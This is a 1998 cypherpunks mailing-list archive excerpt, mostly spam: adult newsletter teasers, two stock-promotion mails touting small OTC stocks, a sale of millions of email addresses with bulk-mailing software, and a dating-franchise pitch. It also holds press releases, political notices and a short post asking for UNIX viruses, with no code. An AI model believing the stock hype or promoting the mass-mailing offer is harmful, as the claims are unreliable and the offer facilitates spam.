MDM1ODE5OTUyNDcwMDAuaHRtIj5XU0o8L0E+KTwvRk9OVD48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxicj48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5GZWRlcmFs
IENvbW11bmljYXRpb25zCkNvbW1pc3Npb24gT3V0bGluZXMgVHJ1dGgtaW4t
QmlsbGluZyBQcm9wb3NhbHM8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9
IkFyaWFsLEhlbHZldGljYSI+VGhlIEZDQyBoYXMgcHVibGlzaGVkIGl0cyBO
b3RpY2Ugb2YgUHJvcG9zZWQKUnVsZW1ha2luZyB3aGljaCBsYXlzIG91dCBy
dWxlcyBvZiB0aGUgcm9hZCBmb3IgdGVsZWNvbSBiaWxsaW5nLiZuYnNwOwoo
PEEgSFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9yZXN1bHRzL3Byb2Zl
c3Npb25hbC9uZXdzL2ZyYW1laW5kZXguY2ZtP2FydGljbGVpZD0zNDUzIj5X
T1ctQ09NPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD48YnI+PC9URD4KCjxURD48L1REPgo8L1RSPgoK
PFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2
ZXRpY2EiPjxGT05UIFNJWkU9KzE+QWlyVG91Y2ggQ2VsbHVsYXIgUmFua3MK
QmVzdCBpbiBHcmVhdGVyIExvcyBBbmdlbGVzIGluIEouRC4gUG93ZXIgYW5k
IEFzc29jaWF0ZXMgU3R1ZHkgb2YgT3ZlcmFsbApDdXN0b21lciBTYXRpc2Zh
Y3Rpb24mbmJzcDs8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+
CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFs
LEhlbHZldGljYSI+Si5ELiBQb3dlciBhbmQgQXNzb2NpYXRlcyByZWxlYXNl
ZCB0b2RheQp0aGUgcmVzdWx0cyBvZiBpdHMgYW5udWFsIFdpcmVsZXNzIEN1
c3RvbWVyIFNhdGlzZmFjdGlvbiBTdHVkeSBhbmQgcmFua2VkCkFpclRvdWNo
IENlbGx1bGFyIGhpZ2hlc3QgaW4gT3ZlcmFsbCBDdXN0b21lciBTYXRpc2Zh
Y3Rpb24gaW4gdGhlIEdyZWF0ZXIKTG9zIEFuZ2VsZXMgbWFya2V0LiAoPEEg
SFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9yZXN1bHRzL3Byb2Zlc3Np
b25hbC9uZXdzL2ZyYW1laW5kZXguY2ZtP2FydGljbGVpZD0zNDU0Ij5XT1ct
Q09NPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48YnI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD4KPEhSIFdJRFRIPSIxMDAlIj48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9
IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT5Gb3IgYWRkaXRpb25h
bCBuZXdzIGFib3V0CnRoZSB3aXJlbGVzcyBpbmR1c3RyeS0taW5jbHVkaW5n
IHBlcmlvZGljIG5ld3MgdXBkYXRlcyB0aHJvdWdob3V0IHRoZSBkYXktLXZp
c2l0CjxBIEhSRUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20iPmh0dHA6Ly93
d3cud293LWNvbS5jb20uPC9BPjwvRk9OVD48L0ZPTlQ+PC9URD4KCjxURD48
L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD4KPEhSIFdJRFRIPSIx
MDAlIj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoK
PFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0t
MT5DVElBIERhaWx5IE5ld3MgZnJvbSBXT1ctQ09NCmlzIHRyYW5zbWl0dGVk
IHdlZWtkYXlzLCBleGNlcHQgZm9yIGhvbGlkYXlzLiBWaXNpdCB1cyBvbiB0
aGUgV29ybGQgV2lkZQpXZWIgYXQgPEEgSFJFRj0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9wcm9mZXNzaW9uYWwiPmh0dHA6Ly93d3cud293LWNvbS5jb20v
cHJvZmVzc2lvbmFsPC9BPi4mbmJzcDs8L0ZPTlQ+PC9GT05UPiZuYnNwOwoK
PFA+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0x
PklmIHlvdSBhcmUgbm90IGludGVyZXN0ZWQKaW4gcmVjZWl2aW5nIHRoZSBD
VElBIERhaWx5IE5ld3MgZnJvbSBXT1ctQ09NLCBwbGVhc2Ugc2VuZCBhIG1l
c3NhZ2UgdG8KPEEgSFJFRj0ibWFpbHRvOnVuam9pbi1DVElBX0RhaWx5X05l
d3NAdW0yLnVuaXR5bWFpbC5jb20iPnVuam9pbi1DVElBX0RhaWx5X05ld3NA
dW0yLnVuaXR5bWFpbC5jb208L0E+LiZuYnNwOzwvRk9OVD48L0ZPTlQ+Jm5i
c3A7Cgo8UD48Qj4qKio8Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxG
T05UIFNJWkU9LTE+IFRoZSB0ZXJtICJ1bmpvaW4tQ1RJQV9EYWlseV9OZXdz
QHVtMi51bml0eW1haWwuY29tIgptdXN0IGJlIGxpc3RlZCBpbiB0aGUgVE8g
c2VjdGlvbiBvZiB0aGUgZW1haWwuPC9GT05UPjwvRk9OVD4gKioqPC9CPiZu
YnNwOwoKPFA+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBT
SVpFPS0xPlBsZWFzZSBOb3RlOiBTb21lIG9mIHRoZQpsaW5rcyBpbiB0b2Rh
eSdzIG5ld3MgYXJlIHRpbWUgc2Vuc2l0aXZlLiZuYnNwOyBUaG9zZSBsaW5r
cyBtYXkgbm90IGJlCmF2YWlsYWJsZSBhcyBuZXdzIGNoYW5nZXMgdGhyb3Vn
aG91dCB0aGUgZGF5LiZuYnNwOyBBbHNvLCBzb21lIG5ld3Mgc291cmNlcwpt
YXkgYmUgc3Vic2NyaXB0aW9uLWJhc2VkIG9yIHJlcXVpcmUgcmVnaXN0cmF0
aW9uLjwvRk9OVD48L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD4KPEhSIFdJRFRIPSIxMDAlIj48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+CjwvVEFCTEU+PC9DRU5URVI+Cgo8Q0VOVEVSPiZuYnNw
OzwvQ0VOVEVSPgoKPC9CT0RZPgo8L0hUTUw+Cg==
--Boundary..3996.1071713805.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: News Letter <news@quake.connectfree.net>
Date: Wed, 23 Sep 1998 15:49:32 -0700 (PDT)
Subject: ConnectFree September 98 Newsletter
Message-ID: <199809232249.XAA13993@swampthing.connectfree.net>
MIME-Version: 1.0
Content-Type: text/plain



Connect Free					Newsletter 					September 98


Welcome to Connect Free, and thank you for joining our service, we hope you
find our first newsletter informative.

						Aardvaak

For the avoidance of doubt, Aardvaak is a reseller for FREE Internet access
for Connect Free, if you have signed up to the service through Aardvaak you
are a customer of Connect Free and not Aardvaak, however this is only in
relation to FREE Internet access and not any other service that maybe
available through Aardvaak.

----------------------------------------------------------------------------
----------------------------------

						Games Service

The Games Service is now live and can be accessed as of today, the reason
for the delay is because it has been on trial. Connect Free aims to have
the fastest and cheapest way of connecting and playing your favourite games
on-line with others across the UK, Quake is the first game to come on-line.
(If you have not ever played games on-line before, take it from me, what an
experience)

----------------------------------------------------------------------------
----------------------------------

						Sending E-mails

Because the service is FREE, we are open to abuse by hackers and people
using the service to send out unsolicited e-mails, as a deterrent we have
had to raise the security.=20
As of now, anyone sending e-mails from other service providers, will need
to re-configure their mail package for sending e-mails from
smtp.connectfree.net

----------------------------------------------------------------------------
----------------------------------

						Future Developments

Coming Soon=85 FREE telephone numbers, for example Premium and Personal rate
numbers. These numbers are not only FREE but you can also make money from
the calls, "makes a change from BT making all the money".

How does it work? Simple, you just attach a Personal or Premium rate number
to your existing telephone number and inform who ever you wish what the new
number is and start to make income from the calls you receive.
(Ideal for people running a business from home)=20

A Personal Number is a number for life and is charged at around about 31p
in the day and 12p in the evening, if you move house the number moves with
you. Premium rate numbers are those awful numbers that no one wants to
phone which are charged at 50p and =A31 a minute,=20

How much money can I make? Depends on how many calls you receive and it's a
great way for compensating against the cost of the local call when
connecting to our service.=20

How does Connect Free make money out of all this? well, it's a win, win
situation, you make money, we make money, and we all get the satisfaction
that for a change we are all making money instead of BT. IT's GOOD TO TALK.

More information will be available soon.

----------------------------------------------------------------------------
----------------------------------

							Engaged Tones

If you have received any engaged tones? please except our appologies,
however in October of this year we will be doubling our capacity, and in
March of next year we will quadruple our capacity.

----------------------------------------------------------------------------
----------------------------------

							Improvements

Connect Free would like to hear from you, if there are any ways in which
you think we could improve our service, or add more content to the Connect
Free web site.=20

It is Connect Free policy not to send unwanted rubbish by e-mail or junk
advertising by any other means. All we ask is that you receive our monthly
newsletter informing you of any changes to the service and any new service
that may come available which you may benefit from.
Please note that Terms & Conditions are available from the Connect Free web
site.

----------------------------------------------------------------------------
----------------------------------

Contact us at	 	info@connectfree.net 	or 	Telephone 0702 115 2525

The end
____________________________________________________________________________
__________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Thu, 24 Sep 1998 04:03:23 -0700 (PDT)
To: (STUFFED THURSDAY SEPTEMBER 24 1998)
Subject: TODAY'S NEWS AND PICS PACKED STUFFED! - READ IT NOW!
Message-ID: <19980924071000.4990.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ THE ESSENTIALS OF SEDUCTION
+ CELEBRATE SEX
+ BUTTNAKED FROLIC
+ THE BEST OF EUREKA
+ PLENTY OF SEX ON THE NET
+ PUSSY FLAVORED CANDY
+ SEX OLYMPICS
+ HAUNTING NUDDY PICS

       ---->   http://stuffed.net/98/9/24/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/24/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: listmaster@extensis.com
Date: Thu, 24 Sep 1998 18:12:46 -0700 (PDT)
To: undisclosed-recipients:;
Subject: More Tools.  No "Futzing" - Mask Pro 2.0
Message-ID: <bulk.23667.19980924114008@ssl.extensis.com>
MIME-Version: 1.0
Content-Type: text/plain


Announcing Extensis Mask Pro 2.0 


Now, get more tools, more control, and NO "futzing" with 
Mask Pro 2.0 http://www.extensis.com/products/MaskPro/


 NEW! EdgeBlender technology removes background colors from mask edges.
 NEW! PrecisionEdge detection creates EDITABLE magic paths for precise edging.
 NEW! IntelliBrush removes background color from an individual layer.
 NEW! Global choke tightens your entire mask-instantly. 
 IMPROVED! Smarter color-matching technology gives one-click masking.


Extensis MaskPro 2.0 is a significant upgrade to the industry standard
in masking software.  Mask Pro 2.0 features an expanded and enhanced 
set of sophisticated tools that let you take on any masking challenge 
and deliver professional, print-ready results. Mask Pro 2.0 gives you 
the power tools to create precision masks which far exceed the standard 
tools available in Photoshop 5.  With Extensis Mask Pro 2.0, spend 
your time creating, not "futzing".

With NEW EdgeBlender technology, instantly remove background colors 
from your mask edges, providing superior edges with NO halos. Then, 
use IntelliBrush and IntelliWand to remove background colors from a 
single layer-in a single click.  Experiment freely without 
concern-Mask Pro 2.0 has incremental and entire brush-stroke undos. 
Better yet, for complex edges, use PrecisionEdge to automatically 
create an editable magic path-adjust the tolerance, choke, threshold 
or edit the path on a pixel-level for the most precise edges possible. 

Best yet, access all of Mask Pro's tools from the NEW Extensis 
menu-right in Photoshop-using the commands you already know.

More Tools. More Control.  No "Futzing".  Mask Pro 2.0.


SPECIAL UPGRADE OFFER to Mask Pro 1.0 Owners:
Upgrade to Mask Pro 2.0 NOW for only $99.95 (SAVE $200)

SPECIAL OFFER to all Extensis Customers:
Buy Mask Pro 2.0 NOW for only $249.95 (SAVE $50!)

OFFER FOR EXTENSIS FRIENDS:
Buy Mask Pro 2.0 NOW for only $299.95- and save on future Extensis purchases!

To ORDER, download a free demo, or for more information, please visit:
http://www.extensis.com/products/MaskPro/
Or call Extensis at (800) 796-9798 or (503) 274-2020.


Extensis Mask Pro is fully compatible with Adobe Photoshop 4 and 5 
(Mac and Windows) and Photo-Paint (Windows).


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PS. We have made every effort to ensure this message is being sent 
only to people who have expressed interest in Extensis products.  
If we have sent this to you in error, please accept our apologies 
and reply with "REMOVE" in the subject line for automatic exclusion 
from future communications.  If you know someone who would like to 
be on our mailing list have them send an email to 
listmaster@extensis.com with "ADD" in the subject line and their 
email address in the body.

P.P.S. This message is intended for North American customers.  
If you are located outside of North America and have received this 
message, please visit  www.extensis.com/purchase/ to find the nearest 
local distributor in your country.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scott Balson" <mb2657b@enterprise.powerup.com.au>
Date: Thu, 24 Sep 1998 01:49:10 -0700 (PDT)
To: <Undisclosed.Recipients>
Subject: Urgent - ABC coverage on One Nation
Message-ID: <009801bde798$72c80bc0$f81c64cb@QU.fox.uq.net.ai>
MIME-Version: 1.0
Content-Type: text/plain





Dear One Nation supporter
 
Att 6.55pm the ABC will be carrying a 5 minute 
address by One Nation.
 
We apologise for the short time warning, but we 
have just been advised.
 
The One Nation Health Policy released today is 
now on line at:
 
<A 
href="http://www.gwb.com.au/onenation/policy/health.html">http://www.gwb.com.au/onenation/policy/health.html
 
GWB
 
 
 
Scott Balson
Pauline Hanson's One Nation Web 
Master


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Thu, 24 Sep 1998 18:45:12 -0700 (PDT)
To: edsmith@IntNet.net
Subject: This is a good one!
Message-ID: <3.0.2.32.19980924214334.007e97d0@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain





If you have Microsoft Word (6.0 or later), and have a thesaurus
installed, do the following:

1) Open a new, blank document.
2) Type in the words: I'd like to see Bill Clinton resign.
3) Highlight the entire sentence.
4) Click on the tools menu and select thesaurus (tools, language,
   thesaurus)

Look what is immediately highlighted in the selection box. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: winkler.elke@usa.net
Date: Fri, 25 Sep 1998 05:19:25 -0700 (PDT)
Subject: Hello from USA,
Message-ID: <199809251219.FAA00402@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is Elke agian, it's been a while we've exchanged our e-mails.
I'd like to touch bases with you again on the 
Network Branch.

Are you still interested in setting your own business on the internet?

Our project is ready to be taken over. So you can run your branch 
of an International Dating, Matchmaking and Travel Service 
in your region.

We will provide for you all necessary setup, software, etc.,
and you can start making your money right away!
So, please get back to me on that.

Warmly,
Elke Winkler
Berlin, Germany

winkler.elke@usa.net
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Fri, 25 Sep 1998 02:49:35 -0700 (PDT)
To: (STUFFED FRIDAY SEPTEMBER 25 1998)
Subject: TODAY'S NEWS AND PICS PACKED STUFFED! - READ IT NOW!
Message-ID: <19980925071000.4056.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ BOP TIL YOU DROP
+ SEX MAD FOR IT
+ STUPID SPICE
+ THE BEST OF EUREKA
+ PANTY THEIF
+ LEZ BE PALS
+ WHIP U
+ DO I TAFT TO

       ---->   http://stuffed.net/98/9/25/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/25/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Fri, 25 Sep 1998 08:59:54 -0700 (PDT)
To: edsmith@IntNet.net
Subject: Georges
Message-ID: <3.0.2.32.19980925115803.00818600@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain


The rain has started here in north Tampa. Hope to see all of you in the
next life. :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "FYI Stock Alert" <59426627@27995.com>
Date: Fri, 25 Sep 1998 09:50:20 -0700 (PDT)
To: Friend@public.com
Subject: What does IBM Know about ClearWorks that you don't?
Message-ID: <199809251643.LAA00964@sparky.clearworks.net>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>
"ClearWorks Technologies...announced it has been 
selected as an IBM Authorized Home Systems Integrator."

"ClearWorks has been trained by IBM to provide superior installation and
reliable service...[to] residents throughout the US."
--Excerpts from the ClearWorks Technologies Official Press release,
September 25th, 1998

Don't miss this one!  CLWK (OTC BB)
To read the rest of the offical press release go to:
http://www.fyistockalert.com

For more information e-mail sales@fyistockalert.com


</FONT><FONT  COLOR="#000000" SIZE=3>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marita Nsman-Repo <Marita.Nasman-Repo@DataFellows.com>
Date: Fri, 25 Sep 1998 08:55:38 -0700 (PDT)
To: F-Secure-Press-Global@DataFellows.com
Subject: MEDIA RELEASE: Data Fellows and BackWeb sign agreement
Message-ID: <3.0.32.19980925160509.00971740@smtp.datafellows.com>
MIME-Version: 1.0
Content-Type: text/plain




For immediate release.
September 25, 1998

####################################

Data Fellows to integrate BackWeb's technology into CounterSign architecture 


Helsinki, Finland, September 25, 1998 - Data Fellows Ltd., a leading data
security vendor, and BackWeb Technologies, a leader in push solutions for
Knowledge Distribution, today announced an agreement to integrate BackWeb's
Polite Server and Agent technology into Data Fellows' CounterSign
management architecture. The CounterSign architecture provides a scalable,
policy-based framework for managing the security infrastructure. 

By including BackWeb technology in Data Fellows products, protection
against security breaches reaches the highest level, as the security system
will automatically and transparently keep itself up-to-date during idle
time online. BackWeb's solution will complement the existing Internet
update technology in F-Secure security products, which include F-Secure
Workstation Suite, F-Secure Anti-Virus, F-Secure FileCrypto, F-Secure VPN+,
F-Secure SSH and F-Secure NameSurfer. 

"Combining our integrated security solutions with BackWeb's Polite
distribution technology provides clear benefits to corporate customers in
today's insecure Internet environments," said Risto Siilasmaa, President
and CEO of Data Fellows. "The use of bandwidth-friendly and scaleable push
technology is a natural extension of our strong Internet approach." 

F-Secure utilizes BackWeb's new client, which allows data transfer to
customer networks securely even through firewalls. Administrators of
corporate networks will be able to make the decision about deploying a
particular version update in their networks, on a case-by-case basis, if
they prefer to evaluate the updates before deployment. This type of
implementation ensures that customers always have the latest versions on
hand and are able to follow company security policy on software
distribution. Data Fellows will also utilize the BackWeb broadcast channel
for delivering alerts as well as relevant product service and support
information to the corporate administrators and to its partners world-wide. 

Data Fellows' future plans include establishing partnerships with ISPs for
using BackWeb's push technology and its down- and upstream capabilities to
enable ISPs to find new sources of revenue from value-added services, such
as well-managed security services.

About Data Fellows

Data Fellows is one of the world's leading developers of data security
products. The Company develops, markets and supports anti-virus, data
security and cryptography software products for corporate computer
networks. It has offices in San Jose, California, and Espoo, Finland, with
corporate partners, VARs and other distributors in over 80 countries around
the world. 

All F-Secure products are integrated into the CounterSign management
architecture, which provides a three-tier, scaleable, policy-based
management infrastructure to minimize the costs of security management. 

F-Secure Workstation Suite consists of malicious code detection and
removal, unobtrusive file and network encryption, and personal firewall
functionality, all integrated into a policy-based management architecture.

F-Secure Anti-Virus, with multiple scanning engines (including F-PROT and
AVP), is the most comprehensive, real-time virus scanning and protection
system for all Windows platforms. 

F-Secure VPN+ provides a software-based, IPSEC-compliant Virtual Private
Network solution for large corporate networks as well as remote and small
office networks. 

F-Secure FileCrypto is the first and only product to integrate strong
real-time encryption directly into the Windows file system.

FSecure SSH provides secure remote login, terminal, and other connections
over unsecured networks. It is the most widely used secure remote
administration tool.

F-Secure NameSurfer is the solution for remote Internet and Intranet DNS
administration.  Its easy-to-use WWW user interface automates and
simplifies DNS administration.

The Company has customers in more than 100 countries, including many of the
world's largest industrial corporations and best-known telecommunications
companies, major international airlines, European governments, post offices
and defense forces, and several of the world's largest banks. 

The Company was named one of the Top 100 Technology companies in the world
by Red Herring magazine in its September 1998 issue. Other commendations
include Hot Product of the Year 1997 (Data Communications Magazine); Best
Anti-Virus product (SVM Magazine, May 1997); Editor's Choice (SECURE
Computing Magazine); and the 1996 European Information Technology Prize.

For more information, please contact:

USA:

Data Fellows Inc. 
Mr. Petri Laakkonen, President
Tel. +1 408 938 6700, fax  +1 408 938 6701
E-mail:  Petri.Laakkonen@DataFellows.com

Europe:

Data Fellows Oy
Mr. Jari Puhakka, Director, Business Development 
PL 24   
FIN-02231 ESPOO				
Tel.  +358 9 859 900, fax. +358 9 8599 0599
E-mail: Jari.Puhakka@DataFellows.com
or visit our web site at http://www.DataFellows.com

--
Marita.Nasman-Repo@DataFellows.com, 
World-Wide Web http://www.DataFellows.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Scott Balson" <mb2657b@enterprise.powerup.com.au>
Date: Thu, 24 Sep 1998 23:19:05 -0700 (PDT)
To: <Undisclosed.Recipients>
Subject: Release of Veterans' Affairs policy
Message-ID: <006601bde84c$717e40e0$f81c64cb@QU.fox.uq.net.ai>
MIME-Version: 1.0
Content-Type: text/plain





Please check:
 
<A 
href="http://www.gwb.com.au/onenation/policy/vet.html">http://www.gwb.com.au/onenation/policy/vet.html
 
GWB
 
 
 
Scott Balson


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kdss@proxy.businessnet.dk
Date: Sat, 26 Sep 1998 00:20:10 -0700 (PDT)
To: jai4@beg1
Subject: Hello
Message-ID: <199809260925.KAA11731@proxy.businessnet.dk>
MIME-Version: 1.0
Content-Type: text/plain


AN OFFER YOU CAN'T REFUSE!

Hi.  Ever thought about bulk E-mailing? I have done 
some extensive research into the bulk email business.
I have found that people charge outrageous prices to
send you these names.  I have a database of over10  million 
email addresses. Many companies claim they have 20, 30, even up to 50 million email 
addresses for sale.  It has been our experience that these companies are selling you 4 or 5
million addresses duplicated many times.  We sort all of our addresses and remove all 
duplicates.  We also include a full working demo of Stealth Mass Mailer, the most powerful
email program on the market, capable of sending up to 400,000 email addreses per hour.   


1 MILLION EMAIL NAMES - $49
2 MILLION EMAIL NAMES - $74
15 MILLION EMAIL NAMES - $199


All orders are sent on CD.

Bulk E-mailing is a great way to make money.  I have sold many 
things on the web and have always been successful.  


If you have any questions you can email us at jmelle@bellatlantic.net or call us at
(702) 294-7769 between the hours of 11 am - 3 pm Pacific.

TO BE REMOVED EMAIL US AT jmelle@bellatlantic.net AND YOU WILL BE REMOVED
IMMEDIATELY.


To order print this form: 

--------------------------------------------------------------
__1 million email names - $49

__2 million email names - $74

__15 million email names - $99

__10 million email names - $199


Please add $6 for shipping.

I understand that all orders include a full 
working demo bulk email program.

Please fill out the following:

Name_______________________________

Company name_______________________

Address____________________________

City, State, Zip___________________

Telephone #(___)___-____

E-mail address_______________________

Send your check or money order to:

IMC Marketing
PO Box 61798
Boulder City, NV 89006

Or to pay by "Check by phone" call us at (702) 294-7769 between the hours of 
11 am - 3 pm Pacific.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Sat, 26 Sep 1998 03:10:10 -0700 (PDT)
To: (STUFFED SATURDAY SEPTEMBER 26 1998)
Subject: TODAY'S NEWS AND PICS PACKED STUFFED! - READ IT NOW!
Message-ID: <19980926071000.22742.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 FREE HOT JPEG PHOTOS
+ 5 SUPER SEXY STORIES
+ HOT AND SPICY FISH TACOS
+ SCENTUAL SCROTUMS
+ PORNO AIDE JOB AT HUSTLER FOR STARR
+ THE BEST OF EUREKA
+ PERVY GETS SKIRTY
+ 3-D PORN - SEEING IS BELIEVING
+ IT MIGHT BE A BOY
+ TINKERBELL PRIEST
+ COMMANDER IN QUEEF

       ---->   http://stuffed.net/98/9/26/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/26/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Han Solo <apocalipsisx@yahoo.com>
Date: Sat, 26 Sep 1998 10:11:00 -0700 (PDT)
To: HACKERS@PLEARN.EDU.PL
Subject: Virus for UNIX
Message-ID: <19980926171206.958.rocketmail@send103.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello!!!

Somebody can tell me about a site where I can find virus for UNIX
systems.

I need them please!!!!!!!!!





_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: oppykm@usa.net
Date: Sun, 27 Sep 1998 04:04:03 -0700 (PDT)
To: oppykm@usa.net
Subject: This stock up 250%
Message-ID: <199809271103.FAA07168@Rt66.com>
MIME-Version: 1.0
Content-Type: text/plain



Omicron Technologies, Inc. 


The stock is up 250% in less than 45 days. 


 

During this same time period the DOW has gone down over 1,700 points!


This obscure, but soon to be famous company can make you a fortune
with patented technology originally developed for NASA


Don't Miss This One


For more information: http://www.network-2001.com/orcron


The stock symbol is: OGPS


_______________________

 

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Sun, 27 Sep 1998 01:54:04 -0700 (PDT)
To: (STUFFED SUNDAY SEPTEMBER 27 1998)
Subject: TODAY'S NEWS AND PICS PACKED STUFFED! - READ IT NOW!
Message-ID: <19980927071000.5189.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 FREE HOT JPEG PHOTOS
+ 5 SUPER SEXY STORIES
+ OH MY GOD, YOU'RE MARRIED
+ TROY BEYER TALKS ABOUT SEX
+ THE BOTTOM LINE IN SURFING FOR SEX
+ THE BEST OF EUREKA
+ SEX COURT
+ MENO-PLAY
+ MAROONED IN THE BIG EASY
+ SEX STILL SELLS

       ---->   http://stuffed.net/98/9/27/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/27/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sales@galaxyhp.com
Date: Sun, 27 Sep 1998 12:03:19 -0700 (PDT)
Subject: Medical Equipment
Message-ID: <199809271902.MAA21566@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



==================================================
You're receiving this email because you are an Apple Macintosh
user. If you wish to be excluded from any future mailings please
return this message with "remove" (without quotes) as the subject.
==================================================

GALAXY specializes in the repair and upgrade of Apple
Macintosh, PowerMacintosh and PowerBook computers.

We provide component level repair, with 6 month warranty,
for Motherboards, Power Supplies and Floppy Drives 
for all Macintosh and PowerComputing Systems.  

We sell new and used Macintosh, PowerMacintosh 
and PowerBook computers, and wide range of  parts:

Motherboards, Floppy Drives, RAM, Hard Drives, 
CD-ROM Drives, Zip Drives, Video Cards,  Monitors, 
Printers, Accelerators, G3 Cards, Cache Cards,  
FPU's,  Cables,  Modems,  Power Supplies & Adapters,  
Keyboards,  Mice, Ethernet Cards, Batteries, 
Pentium Cards, Case Parts.  .  and a whole lot more!

Our prices are very competitive, for example:
-    PowerMac 7200/75MHz 8/500/CD - $599  (Ref :90day) 
-    Apple 200MHz PPC604e Card  $199    (New: 2yr)
-    1.44MB auto-insert floppy drive    $65  (Ref: 6mths)
-    Power Computing power supply repair   $115  (Ref: 6mths)
